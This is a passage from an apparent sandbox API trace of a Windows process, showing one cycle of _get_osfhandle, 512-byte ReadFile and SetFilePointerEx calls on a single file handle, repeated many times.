lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.790] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0092.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 
[0092.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.792] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.792] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.792] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.792] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.792] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, 
lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.792] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.792] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 
[0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.793] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, 
lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 
[0092.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.796] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.796] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.796] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.796] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.796] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.796] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.797] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
